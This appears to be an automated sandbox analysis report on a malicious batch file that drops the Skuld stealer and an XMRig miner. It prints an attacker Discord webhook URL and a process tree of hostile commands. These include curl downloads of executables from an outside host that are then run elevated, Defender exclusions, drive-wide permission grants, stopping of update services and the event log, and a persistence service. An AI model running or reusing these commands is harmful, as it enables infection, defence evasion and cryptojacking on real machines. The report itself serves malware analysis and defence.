Analysis
-
max time kernel
149s -
max time network
153s -
platform
windows10-2004_x64 -
resource
win10v2004-20250314-en -
resource tags
arch:x64arch:x86image:win10v2004-20250314-enlocale:en-usos:windows10-2004-x64system -
submitted
05/04/2025, 12:03
Static task
static1
Behavioral task
behavioral1
Sample
pyra/Pyra.exe
Resource
win10v2004-20250314-en
Behavioral task
behavioral2
Sample
pyra/data/data.bat
Resource
win10v2004-20250314-en
General
-
Target
pyra/data/data.bat
-
Size
2KB
-
MD5
cf53469fbe70862f8395e48088f5dc39
-
SHA1
2c0061116ec9d52689a27930c22dafcb26a89f71
-
SHA256
1dcdbb2c5ca99456ae680c7777226caa09b1cab8be979c69729a1c307d7b6806
-
SHA512
c0900865407b40f98f873043978e0bd162fd81e36f163110565683a8bcf0ea16204bdfd26cf1216ce395bc2b002737a84ee8669ddd0cc4e226b778a70e7f8fe2
Malware Config
Extracted
skuld
https://discord.com/api/webhooks/1357468186764775586/BRP230l-SHvQfTpsLO5GgfFtW8ZwDogt43OWww-lXchxPOAw7f7pT6n98q0MMIyhGHyc
Signatures
-
Skuld family
-
Xmrig family
-
XMRig Miner payload 12 IoCs
resource yara_rule behavioral2/memory/3876-107-0x0000000140000000-0x0000000140835000-memory.dmp xmrig behavioral2/memory/3876-106-0x0000000140000000-0x0000000140835000-memory.dmp xmrig behavioral2/memory/3876-105-0x0000000140000000-0x0000000140835000-memory.dmp xmrig behavioral2/memory/3876-104-0x0000000140000000-0x0000000140835000-memory.dmp xmrig behavioral2/memory/3876-101-0x0000000140000000-0x0000000140835000-memory.dmp xmrig behavioral2/memory/3876-108-0x0000000140000000-0x0000000140835000-memory.dmp xmrig behavioral2/memory/3876-102-0x0000000140000000-0x0000000140835000-memory.dmp xmrig behavioral2/memory/3876-109-0x0000000140000000-0x0000000140835000-memory.dmp xmrig behavioral2/memory/3876-110-0x0000000140000000-0x0000000140835000-memory.dmp xmrig behavioral2/memory/3876-112-0x0000000140000000-0x0000000140835000-memory.dmp xmrig behavioral2/memory/3876-113-0x0000000140000000-0x0000000140835000-memory.dmp xmrig behavioral2/memory/3876-111-0x0000000140000000-0x0000000140835000-memory.dmp xmrig -
Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
pid Process 5604 powershell.exe 4512 powershell.exe 5648 powershell.exe 948 powershell.exe 628 powershell.exe -
Creates new service(s) 2 TTPs
-
Downloads MZ/PE file 1 IoCs
flow pid Process 7 5588 curl.exe -
Stops running service(s) 4 TTPs
-
Executes dropped EXE 3 IoCs
pid Process 4556 file1.exe 5116 file2.exe 1636 iixpziuhlnum.exe -
Modifies file permissions 1 TTPs 26 IoCs
pid Process 2796 icacls.exe 5044 icacls.exe 4156 icacls.exe 2512 icacls.exe 4672 icacls.exe 1028 icacls.exe 2188 icacls.exe 2916 icacls.exe 2404 icacls.exe 5820 icacls.exe 2988 icacls.exe 4332 icacls.exe 612 icacls.exe 4536 icacls.exe 744 icacls.exe 3436 icacls.exe 4300 icacls.exe 4268 icacls.exe 1380 icacls.exe 3408 icacls.exe 2120 icacls.exe 5968 icacls.exe 5000 icacls.exe 5980 icacls.exe 5476 icacls.exe 952 icacls.exe -
Power Settings 1 TTPs 8 IoCs
powercfg controls all configurable power system settings on a Windows system and can be abused to prevent an infected host from locking or shutting down.
pid Process 2756 powercfg.exe 6072 powercfg.exe 1500 powercfg.exe 4388 powercfg.exe 1048 powercfg.exe 2188 powercfg.exe 5820 powercfg.exe 5044 powercfg.exe -
Drops file in System32 directory 4 IoCs
description ioc Process File opened for modification C:\Windows\system32\MRT.exe file2.exe File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log powershell.exe File opened for modification C:\Windows\system32\MRT.exe iixpziuhlnum.exe -
Suspicious use of SetThreadContext 2 IoCs
description pid Process procid_target PID 1636 set thread context of 2404 1636 iixpziuhlnum.exe 191 PID 1636 set thread context of 3876 1636 iixpziuhlnum.exe 194 -
resource yara_rule behavioral2/memory/3876-96-0x0000000140000000-0x0000000140835000-memory.dmp upx behavioral2/memory/3876-107-0x0000000140000000-0x0000000140835000-memory.dmp upx behavioral2/memory/3876-106-0x0000000140000000-0x0000000140835000-memory.dmp upx behavioral2/memory/3876-105-0x0000000140000000-0x0000000140835000-memory.dmp upx behavioral2/memory/3876-104-0x0000000140000000-0x0000000140835000-memory.dmp upx behavioral2/memory/3876-101-0x0000000140000000-0x0000000140835000-memory.dmp upx behavioral2/memory/3876-108-0x0000000140000000-0x0000000140835000-memory.dmp upx behavioral2/memory/3876-102-0x0000000140000000-0x0000000140835000-memory.dmp upx behavioral2/memory/3876-100-0x0000000140000000-0x0000000140835000-memory.dmp upx behavioral2/memory/3876-98-0x0000000140000000-0x0000000140835000-memory.dmp upx behavioral2/memory/3876-99-0x0000000140000000-0x0000000140835000-memory.dmp upx behavioral2/memory/3876-97-0x0000000140000000-0x0000000140835000-memory.dmp upx behavioral2/memory/3876-109-0x0000000140000000-0x0000000140835000-memory.dmp upx behavioral2/memory/3876-110-0x0000000140000000-0x0000000140835000-memory.dmp upx behavioral2/memory/3876-112-0x0000000140000000-0x0000000140835000-memory.dmp upx behavioral2/memory/3876-113-0x0000000140000000-0x0000000140835000-memory.dmp upx behavioral2/memory/3876-111-0x0000000140000000-0x0000000140835000-memory.dmp upx -
Launches sc.exe 14 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 3320 sc.exe 5368 sc.exe 4840 sc.exe 3680 sc.exe 5188 sc.exe 5508 sc.exe 4456 sc.exe 3484 sc.exe 5196 sc.exe 4464 sc.exe 4176 sc.exe 6084 sc.exe 1840 sc.exe 4504 sc.exe -
Delays execution with timeout.exe 1 IoCs
pid Process 2244 timeout.exe -
Modifies data under HKEY_USERS 46 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe -
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 628 powershell.exe 628 powershell.exe 5648 powershell.exe 5648 powershell.exe 948 powershell.exe 948 powershell.exe 5116 file2.exe 5604 powershell.exe 5604 powershell.exe 5116 file2.exe 5116 file2.exe 5116 file2.exe 5116 file2.exe 5116 file2.exe 5116 file2.exe 5116 file2.exe 5116 file2.exe 5116 file2.exe 5116 file2.exe 5116 file2.exe 5116 file2.exe 5116 file2.exe 5116 file2.exe 1636 iixpziuhlnum.exe 4512 powershell.exe 4512 powershell.exe 1636 iixpziuhlnum.exe 1636 iixpziuhlnum.exe 1636 iixpziuhlnum.exe 1636 iixpziuhlnum.exe 1636 iixpziuhlnum.exe 1636 iixpziuhlnum.exe 1636 iixpziuhlnum.exe 1636 iixpziuhlnum.exe 1636 iixpziuhlnum.exe 1636 iixpziuhlnum.exe 1636 iixpziuhlnum.exe 1636 iixpziuhlnum.exe 3876 explorer.exe 3876 explorer.exe 3876 explorer.exe 3876 explorer.exe 3876 explorer.exe 3876 explorer.exe 3876 explorer.exe 3876 explorer.exe 3876 explorer.exe 3876 explorer.exe 3876 explorer.exe 3876 explorer.exe 3876 explorer.exe 3876 explorer.exe 3876 explorer.exe 3876 explorer.exe 3876 explorer.exe 3876 explorer.exe 3876 explorer.exe 3876 explorer.exe 3876 explorer.exe 3876 explorer.exe 3876 explorer.exe 3876 explorer.exe 3876 explorer.exe 3876 explorer.exe -
Suspicious use of AdjustPrivilegeToken 25 IoCs
description pid Process Token: SeDebugPrivilege 628 powershell.exe Token: SeDebugPrivilege 5648 powershell.exe Token: SeDebugPrivilege 4556 file1.exe Token: SeDebugPrivilege 948 powershell.exe Token: SeDebugPrivilege 5604 powershell.exe Token: SeDebugPrivilege 5116 file2.exe Token: SeShutdownPrivilege 1048 powercfg.exe Token: SeCreatePagefilePrivilege 1048 powercfg.exe Token: SeShutdownPrivilege 4388 powercfg.exe Token: SeCreatePagefilePrivilege 4388 powercfg.exe Token: SeShutdownPrivilege 6072 powercfg.exe Token: SeCreatePagefilePrivilege 6072 powercfg.exe Token: SeShutdownPrivilege 1500 powercfg.exe Token: SeCreatePagefilePrivilege 1500 powercfg.exe Token: SeDebugPrivilege 4512 powershell.exe Token: SeDebugPrivilege 1636 iixpziuhlnum.exe Token: SeShutdownPrivilege 2756 powercfg.exe Token: SeCreatePagefilePrivilege 2756 powercfg.exe Token: SeShutdownPrivilege 5044 powercfg.exe Token: SeCreatePagefilePrivilege 5044 powercfg.exe Token: SeShutdownPrivilege 5820 powercfg.exe Token: SeCreatePagefilePrivilege 5820 powercfg.exe Token: SeShutdownPrivilege 2188 powercfg.exe Token: SeCreatePagefilePrivilege 2188 powercfg.exe Token: SeLockMemoryPrivilege 3876 explorer.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 3884 wrote to memory of 628 3884 cmd.exe 87 PID 3884 wrote to memory of 628 3884 cmd.exe 87 PID 628 wrote to memory of 1672 628 powershell.exe 88 PID 628 wrote to memory of 1672 628 powershell.exe 88 PID 1672 wrote to memory of 1216 1672 cmd.exe 90 PID 1672 wrote to memory of 1216 1672 cmd.exe 90 PID 1216 wrote to memory of 2436 1216 net.exe 91 PID 1216 wrote to memory of 2436 1216 net.exe 91 PID 1672 wrote to memory of 1112 1672 cmd.exe 92 PID 1672 wrote to memory of 1112 1672 cmd.exe 92 PID 1672 wrote to memory of 5588 1672 cmd.exe 93 PID 1672 wrote to memory of 5588 1672 cmd.exe 93 PID 1672 wrote to memory of 5160 1672 cmd.exe 97 PID 1672 wrote to memory of 5160 1672 cmd.exe 97 PID 1672 wrote to memory of 2404 1672 cmd.exe 98 PID 1672 wrote to memory of 2404 1672 cmd.exe 98 PID 1672 wrote to memory of 2796 1672 cmd.exe 99 PID 1672 wrote to memory of 2796 1672 cmd.exe 99 PID 1672 wrote to memory of 2916 1672 cmd.exe 100 PID 1672 wrote to memory of 2916 1672 cmd.exe 100 PID 1672 wrote to memory of 4156 1672 cmd.exe 101 PID 1672 wrote to memory of 4156 1672 cmd.exe 101 PID 1672 wrote to memory of 5044 1672 cmd.exe 102 PID 1672 wrote to memory of 5044 1672 cmd.exe 102 PID 1672 wrote to memory of 5000 1672 cmd.exe 103 PID 1672 wrote to memory of 5000 1672 cmd.exe 103 PID 1672 wrote to memory of 5820 1672 cmd.exe 104 PID 1672 wrote to memory of 5820 1672 cmd.exe 104 PID 1672 wrote to memory of 5980 1672 cmd.exe 105 PID 1672 wrote to memory of 5980 1672 cmd.exe 105 PID 1672 wrote to memory of 2188 1672 cmd.exe 106 PID 1672 wrote to memory of 2188 1672 cmd.exe 106 PID 1672 wrote to memory of 744 1672 cmd.exe 107 PID 1672 wrote to memory of 744 1672 cmd.exe 107 PID 1672 wrote to memory of 2512 1672 cmd.exe 108 PID 1672 wrote to memory of 2512 1672 cmd.exe 108 PID 1672 wrote to memory of 5968 1672 cmd.exe 109 PID 1672 wrote to memory of 5968 1672 cmd.exe 109 PID 1672 wrote to memory of 4536 1672 cmd.exe 110 PID 1672 wrote to memory of 4536 1672 cmd.exe 110 PID 1672 wrote to memory of 1380 1672 cmd.exe 111 PID 1672 wrote to memory of 1380 1672 cmd.exe 111 PID 1672 wrote to memory of 5476 1672 cmd.exe 112 PID 1672 wrote to memory of 5476 1672 cmd.exe 112 PID 1672 wrote to memory of 612 1672 cmd.exe 113 PID 1672 wrote to memory of 612 1672 cmd.exe 113 PID 1672 wrote to memory of 3436 1672 cmd.exe 114 PID 1672 wrote to memory of 3436 1672 cmd.exe 114 PID 1672 wrote to memory of 952 1672 cmd.exe 115 PID 1672 wrote to memory of 952 1672 cmd.exe 115 PID 1672 wrote to memory of 2988 1672 cmd.exe 116 PID 1672 wrote to memory of 2988 1672 cmd.exe 116 PID 1672 wrote to memory of 4300 1672 cmd.exe 117 PID 1672 wrote to memory of 4300 1672 cmd.exe 117 PID 1672 wrote to memory of 4268 1672 cmd.exe 118 PID 1672 wrote to memory of 4268 1672 cmd.exe 118 PID 1672 wrote to memory of 4332 1672 cmd.exe 119 PID 1672 wrote to memory of 4332 1672 cmd.exe 119 PID 1672 wrote to memory of 1028 1672 cmd.exe 120 PID 1672 wrote to memory of 1028 1672 cmd.exe 120 PID 1672 wrote to memory of 2120 1672 cmd.exe 121 PID 1672 wrote to memory of 2120 1672 cmd.exe 121 PID 1672 wrote to memory of 3408 1672 cmd.exe 122 PID 1672 wrote to memory of 3408 1672 cmd.exe 122 -
Views/modifies file attributes 1 TTPs 1 IoCs
pid Process 1720 attrib.exe
Processes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\pyra\data\data.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:3884 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -WindowStyle Hidden -Command "Start-Process cmd -ArgumentList '/c C:\Users\Admin\AppData\Local\Temp\pyra\data\data.bat h' -WindowStyle Hidden"2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:628 -
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c C:\Users\Admin\AppData\Local\Temp\pyra\data\data.bat h3⤵
- Suspicious use of WriteProcessMemory
PID:1672 -
C:\Windows\system32\net.exeNET SESSION4⤵
- Suspicious use of WriteProcessMemory
PID:1216 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 SESSION5⤵PID:2436
-
-
-
C:\Windows\system32\where.exewhere curl4⤵PID:1112
-
-
C:\Windows\system32\curl.execurl -o "C:\Users\Admin\AppData\Local\file1.exe" "https://pyra.mov/test/test1" --silent --show-error4⤵
- Downloads MZ/PE file
PID:5588
-
-
C:\Windows\system32\curl.execurl -o "C:\Users\Admin\AppData\Local\file2.exe" "https://pyra.mov/test/test2" --silent --show-error4⤵PID:5160
-
-
C:\Windows\system32\icacls.exeicacls "%driveLetter:\" /inheritance:r /grant:r "Everyone:F"4⤵
- Modifies file permissions
PID:2404
-
-
C:\Windows\system32\icacls.exeicacls "%driveLetter:\" /inheritance:r /grant:r "Everyone:F"4⤵
- Modifies file permissions
PID:2796
-
-
C:\Windows\system32\icacls.exeicacls "%driveLetter:\" /inheritance:r /grant:r "Everyone:F"4⤵
- Modifies file permissions
PID:2916
-
-
C:\Windows\system32\icacls.exeicacls "%driveLetter:\" /inheritance:r /grant:r "Everyone:F"4⤵
- Modifies file permissions
PID:4156
-
-
C:\Windows\system32\icacls.exeicacls "%driveLetter:\" /inheritance:r /grant:r "Everyone:F"4⤵
- Modifies file permissions
PID:5044
-
-
C:\Windows\system32\icacls.exeicacls "%driveLetter:\" /inheritance:r /grant:r "Everyone:F"4⤵
- Modifies file permissions
PID:5000
-
-
C:\Windows\system32\icacls.exeicacls "%driveLetter:\" /inheritance:r /grant:r "Everyone:F"4⤵
- Modifies file permissions
PID:5820
-
-
C:\Windows\system32\icacls.exeicacls "%driveLetter:\" /inheritance:r /grant:r "Everyone:F"4⤵
- Modifies file permissions
PID:5980
-
-
C:\Windows\system32\icacls.exeicacls "%driveLetter:\" /inheritance:r /grant:r "Everyone:F"4⤵
- Modifies file permissions
PID:2188
-
-
C:\Windows\system32\icacls.exeicacls "%driveLetter:\" /inheritance:r /grant:r "Everyone:F"4⤵
- Modifies file permissions
PID:744
-
-
C:\Windows\system32\icacls.exeicacls "%driveLetter:\" /inheritance:r /grant:r "Everyone:F"4⤵
- Modifies file permissions
PID:2512
-
-
C:\Windows\system32\icacls.exeicacls "%driveLetter:\" /inheritance:r /grant:r "Everyone:F"4⤵
- Modifies file permissions
PID:5968
-
-
C:\Windows\system32\icacls.exeicacls "%driveLetter:\" /inheritance:r /grant:r "Everyone:F"4⤵
- Modifies file permissions
PID:4536
-
-
C:\Windows\system32\icacls.exeicacls "%driveLetter:\" /inheritance:r /grant:r "Everyone:F"4⤵
- Modifies file permissions
PID:1380
-
-
C:\Windows\system32\icacls.exeicacls "%driveLetter:\" /inheritance:r /grant:r "Everyone:F"4⤵
- Modifies file permissions
PID:5476
-
-
C:\Windows\system32\icacls.exeicacls "%driveLetter:\" /inheritance:r /grant:r "Everyone:F"4⤵
- Modifies file permissions
PID:612
-
-
C:\Windows\system32\icacls.exeicacls "%driveLetter:\" /inheritance:r /grant:r "Everyone:F"4⤵
- Modifies file permissions
PID:3436
-
-
C:\Windows\system32\icacls.exeicacls "%driveLetter:\" /inheritance:r /grant:r "Everyone:F"4⤵
- Modifies file permissions
PID:952
-
-
C:\Windows\system32\icacls.exeicacls "%driveLetter:\" /inheritance:r /grant:r "Everyone:F"4⤵
- Modifies file permissions
PID:2988
-
-
C:\Windows\system32\icacls.exeicacls "%driveLetter:\" /inheritance:r /grant:r "Everyone:F"4⤵
- Modifies file permissions
PID:4300
-
-
C:\Windows\system32\icacls.exeicacls "%driveLetter:\" /inheritance:r /grant:r "Everyone:F"4⤵
- Modifies file permissions
PID:4268
-
-
C:\Windows\system32\icacls.exeicacls "%driveLetter:\" /inheritance:r /grant:r "Everyone:F"4⤵
- Modifies file permissions
PID:4332
-
-
C:\Windows\system32\icacls.exeicacls "%driveLetter:\" /inheritance:r /grant:r "Everyone:F"4⤵
- Modifies file permissions
PID:1028
-
-
C:\Windows\system32\icacls.exeicacls "%driveLetter:\" /inheritance:r /grant:r "Everyone:F"4⤵
- Modifies file permissions
PID:2120
-
-
C:\Windows\system32\icacls.exeicacls "%driveLetter:\" /inheritance:r /grant:r "Everyone:F"4⤵
- Modifies file permissions
PID:3408
-
-
C:\Windows\system32\icacls.exeicacls "%driveLetter:\" /inheritance:r /grant:r "Everyone:F"4⤵
- Modifies file permissions
PID:4672
-
-
C:\Windows\system32\timeout.exetimeout /t 15 /nobreak4⤵
- Delays execution with timeout.exe
PID:2244
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Start-Process 'C:\Users\Admin\AppData\Local\file1.exe' -Verb RunAs"4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5648 -
C:\Users\Admin\AppData\Local\file1.exe"C:\Users\Admin\AppData\Local\file1.exe"5⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4556 -
C:\Windows\system32\attrib.exeattrib +h +s C:\Users\Admin\AppData\Local\file1.exe6⤵
- Views/modifies file attributes
PID:1720
-
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Start-Process 'C:\Users\Admin\AppData\Local\file2.exe' -Verb RunAs"4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:948 -
C:\Users\Admin\AppData\Local\file2.exe"C:\Users\Admin\AppData\Local\file2.exe"5⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5116 -
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force6⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5604
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart6⤵PID:3196
-
C:\Windows\system32\wusa.exewusa /uninstall /kb:890830 /quiet /norestart7⤵PID:5172
-
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop UsoSvc6⤵
- Launches sc.exe
PID:6084
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop WaaSMedicSvc6⤵
- Launches sc.exe
PID:3680
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop wuauserv6⤵
- Launches sc.exe
PID:5188
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop bits6⤵
- Launches sc.exe
PID:5508
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop dosvc6⤵
- Launches sc.exe
PID:1840
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 06⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:1048
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 06⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:4388
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-ac 06⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:1500
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-dc 06⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:6072
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe delete "BUZZLBYC"6⤵
- Launches sc.exe
PID:4456
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe create "BUZZLBYC" binpath= "C:\ProgramData\oycwqqzuyrth\iixpziuhlnum.exe" start= "auto"6⤵
- Launches sc.exe
PID:3484
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop eventlog6⤵
- Launches sc.exe
PID:4464
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe start "BUZZLBYC"6⤵
- Launches sc.exe
PID:5196
-
-
-
-
-
-
C:\ProgramData\oycwqqzuyrth\iixpziuhlnum.exeC:\ProgramData\oycwqqzuyrth\iixpziuhlnum.exe1⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1636 -
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force2⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4512
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart2⤵PID:5480
-
C:\Windows\system32\wusa.exewusa /uninstall /kb:890830 /quiet /norestart3⤵PID:5468
-
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop UsoSvc2⤵
- Launches sc.exe
PID:4840
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop WaaSMedicSvc2⤵
- Launches sc.exe
PID:5368
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop wuauserv2⤵
- Launches sc.exe
PID:4504
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop bits2⤵
- Launches sc.exe
PID:3320
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop dosvc2⤵
- Launches sc.exe
PID:4176
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 02⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:2756
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 02⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:5044
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-ac 02⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:5820
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-dc 02⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:2188
-
-
C:\Windows\system32\conhost.exeC:\Windows\system32\conhost.exe2⤵PID:2404
-
-
C:\Windows\explorer.exeexplorer.exe2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3876
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD56cf293cb4d80be23433eecf74ddb5503
SHA124fe4752df102c2ef492954d6b046cb5512ad408
